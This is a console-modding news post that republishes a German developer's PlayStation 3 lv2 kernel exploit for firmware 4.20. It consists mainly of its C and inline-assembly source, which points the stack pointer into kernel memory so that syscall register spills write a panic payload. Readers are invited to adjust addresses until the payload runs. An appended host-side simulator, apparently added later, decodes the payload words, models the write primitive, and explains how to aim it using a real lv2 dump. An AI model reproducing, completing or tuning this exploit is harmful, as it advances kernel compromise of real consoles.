RealModScene
igor242

Another lv2 Exploit – This Time From KDSBest


Another lv2 exploit has been published, this time from German dev KDSBest. He claims he did not get it to work on firmware 4.21, so he did it on 4.20. If you don’t know what lv2 is, you can read up on it on the ps3devwiki.

Since @naehrwert posted an lv2 exploit I will do so too. The stack pointer points to lv2 and if we do a syscall, the syscall saves registers to the stack HAHA. Btw. it just crashes the console for now, since I totally overwrite dump the lv2 or some memory addresses I don’t know. Feel free to try around, adjust the address of the stack pointer and so on. If you manage to get the panic payload executed, tell me!!! ^^

//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf

// Global register variables: each value is pinned to a fixed PPU register.
// r20..r31 are non-volatile in the PowerPC ABI; the post's premise is that the
// lv2 syscall entry saves them to the stack frame that r1 points at.
register unsigned long long payloadHolder2 asm ("r21");
register unsigned long long payloadHolder asm ("r20");
register unsigned long long stackpointer asm ("r1");
register unsigned long long counter asm ("r25");
register unsigned long long bufferStackpointer asm ("r26");

int __volatile__ main(int argc, const char* argv[])
{
    // backup Stack pointer
    bufferStackpointer = stackpointer;

    // Two copies of "li r11, 0x24F" (0x3960024F) and two copies of "sc" (0x44000002)
    payloadHolder = 0x3960024F3960024FUL;
    payloadHolder2 = 0x4400000244000002UL;

    // Incrementer
    counter = 0x00;

    // Play with that address till the panic is executed, I lack the time to do so
    // always add 2 or 4 to it, I would try 4 or 8... bla bla, you will get the idea
    stackpointer = 0x8000000000000100UL;

doItAgain:
    // KDSBest Payload
    // Prepare for our Syscall
    asm("li %r0, 0x0");
    asm("li %r3, 0x6");
    asm("li %r4, 0x1");

    // li r11, 0x24F -> PANIC
    // Fill the non-volatile registers with the first payload word
    asm("mr %r22, %r20");
    asm("mr %r23, %r20");
    asm("mr %r24, %r20");
    asm("mr %r27, %r20");
    asm("mr %r28, %r20");
    asm("mr %r29, %r20");
    asm("mr %r30, %r20");
    asm("mr %r31, %r20");

    // Stack Pointer = Build Address of LV2
    // (counter is added to the current r1, so r1 advances by 0, 4, 8, ... per pass,
    // not by a fixed step)
    stackpointer += counter;

    // Syscall 0xA9
    asm("li %r11, 0xA9");
    asm("sc");

    counter += 0x04;

    // We write sc
    // Fill the non-volatile registers with the second payload word
    asm("mr %r22, %r21");
    asm("mr %r23, %r21");
    asm("mr %r24, %r21");
    asm("mr %r27, %r21");
    asm("mr %r28, %r21");
    asm("mr %r29, %r21");
    asm("mr %r30, %r21");
    asm("mr %r31, %r21");

    // Stack Pointer = Build Address of LV2
    stackpointer += counter;

    // Syscall 0xA9
    asm("li %r11, 0xA9");
    asm("sc");

    counter += 0x04;

    if(counter < 0x1000000)
        goto doItAgain;

    // restore the real stack pointer before returning
    stackpointer = bufferStackpointer;

    return 0;
}

I didn’t manage to make it work on 4.21, so I just did it on 4.20.

Source(PS3HAX)
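The two 64-bit constants in the posted code and the write primitive it relies on (point r1 into lv2, let the syscall entry spill the non-volatile registers there) can be checked offline. The following is an added example, not KDSBest's code and not from the original post: it encodes `li r11, 0x24F` and `sc` from their PowerPC fields to confirm the payload words, then runs the two-pass alternation against a small simulated lv2 window. The simulation makes assumptions the page does not give: the spilled registers r22..r31 are modelled as ten consecutive 8-byte slots at r1 + 0x10 (the real lv2 syscall frame layout is not stated), the window is a 256-byte buffer standing in for memory at 0x8000000000000000, and r1 is advanced with a fixed stride (`r1 = base + counter`), unlike the posted loop, whose `stackpointer += counter` is cumulative. The `0xA9` syscall itself is not modelled; only the register spill is.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* --- PowerPC encoding of the two instructions the payload words contain --- */

/* addi rD, rA, SIMM: primary opcode 14. "li rD, SIMM" is the alias for addi rD, 0, SIMM. */
static uint32_t ppc_addi(unsigned rd, unsigned ra, int16_t simm)
{
    return (14u << 26) | ((rd & 31u) << 21) | ((ra & 31u) << 16) | (uint16_t)simm;
}

static uint32_t ppc_li(unsigned rd, int16_t simm) { return ppc_addi(rd, 0, simm); }

/* sc: primary opcode 17 with bit 30 set, i.e. 0x44000002. */
static uint32_t ppc_sc(void) { return (17u << 26) | 2u; }

/* Two copies of one instruction in a 64-bit register. The PPU is big-endian, so a
 * 64-bit store puts the high word first and the pair decodes as two instructions. */
static uint64_t pack_twice(uint32_t insn) { return ((uint64_t)insn << 32) | insn; }

/* Small decoder, just enough to recognise the two instructions the payload uses. */
static const char *ppc_decode(uint32_t w, char *buf, size_t n)
{
    if ((w >> 26) == 14 && ((w >> 16) & 31) == 0)
        snprintf(buf, n, "li r%u, 0x%X", (w >> 21) & 31, w & 0xFFFF);
    else if (w == 0x44000002u)
        snprintf(buf, n, "sc");
    else
        snprintf(buf, n, ".long 0x%08X", w);
    return buf;
}

/* --- Model of the write primitive (layout values are ASSUMPTIONS, see lead-in) --- */

#define LV2_BASE  0x8000000000000000ULL  /* address the posted code points r1 at */
#define LV2_SIZE  0x100                  /* simulated window size */
#define SPILL_OFF 0x10                   /* assumed frame offset of the spilled r22..r31 */
#define NSPILL    10                     /* r22..r31 */

static uint8_t lv2_mem[LV2_SIZE];        /* stand-in for lv2 memory at LV2_BASE */

static void store_be64(uint8_t *p, uint64_t v)
{
    for (int i = 7; i >= 0; i--) { p[i] = (uint8_t)v; v >>= 8; }
}

static uint32_t lv2_word(uint64_t off)
{
    return ((uint32_t)lv2_mem[off] << 24) | ((uint32_t)lv2_mem[off + 1] << 16) |
           ((uint32_t)lv2_mem[off + 2] << 8) | lv2_mem[off + 3];
}

/* Simulated "sc" with r1 == sp and r22..r31 all holding val: the entry code spills the
 * ten non-volatile registers to consecutive 8-byte slots at sp + SPILL_OFF.
 * Returns -1 when the frame would fall outside the simulated window. */
static int simulated_syscall_spill(uint64_t sp, uint64_t val)
{
    if (sp < LV2_BASE || sp - LV2_BASE + SPILL_OFF + 8 * NSPILL > LV2_SIZE)
        return -1;
    uint64_t off = sp - LV2_BASE + SPILL_OFF;
    for (int i = 0; i < NSPILL; i++, off += 8)
        store_be64(&lv2_mem[off], val);
    return 0;
}

/* The posted two-pass loop with a fixed stride: r1 = base + counter, counter += 4 per
 * syscall, alternating the li pair and the sc pair. Each pass is shifted 4 bytes from
 * the previous one and overwrites the second word of every slot that pass wrote, so
 * the surviving words alternate li / sc / li / sc. Returns the number of syscalls run. */
static int run_spray(uint64_t base, int steps)
{
    const uint64_t li_pair = pack_twice(ppc_li(11, 0x24F));
    const uint64_t sc_pair = pack_twice(ppc_sc());
    int done = 0;
    for (uint64_t counter = 0; done < steps; counter += 4, done++)
        if (simulated_syscall_spill(base + counter, (done & 1) ? sc_pair : li_pair) != 0)
            break;
    return done;
}

int main(void)
{
    char buf[32];
    int n = run_spray(LV2_BASE, 8);
    printf("simulated %d syscalls; words at lv2 + 0x%x:\n", n, SPILL_OFF);
    for (uint64_t off = SPILL_OFF; off < SPILL_OFF + 4 * 12; off += 4)
        printf("  %016llx: %08x  %s\n", (unsigned long long)(LV2_BASE + off),
               lv2_word(off), ppc_decode(lv2_word(off), buf, sizeof buf));
    return 0;
}
```

Compile with any host C compiler (e.g. `cc sim.c -o sim && ./sim`); nothing here needs the PPU toolchain. The decoded listing shows why the posted loop alternates the two register fills: with only 8-byte stores available, the 4-byte shift between passes is what turns two repeated words into an `li r11, 0x24F` / `sc` sequence. If you change `SPILL_OFF` or `NSPILL` to match a frame layout you have recovered from a real lv2 dump, the listing tells you where the sled would land relative to r1.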
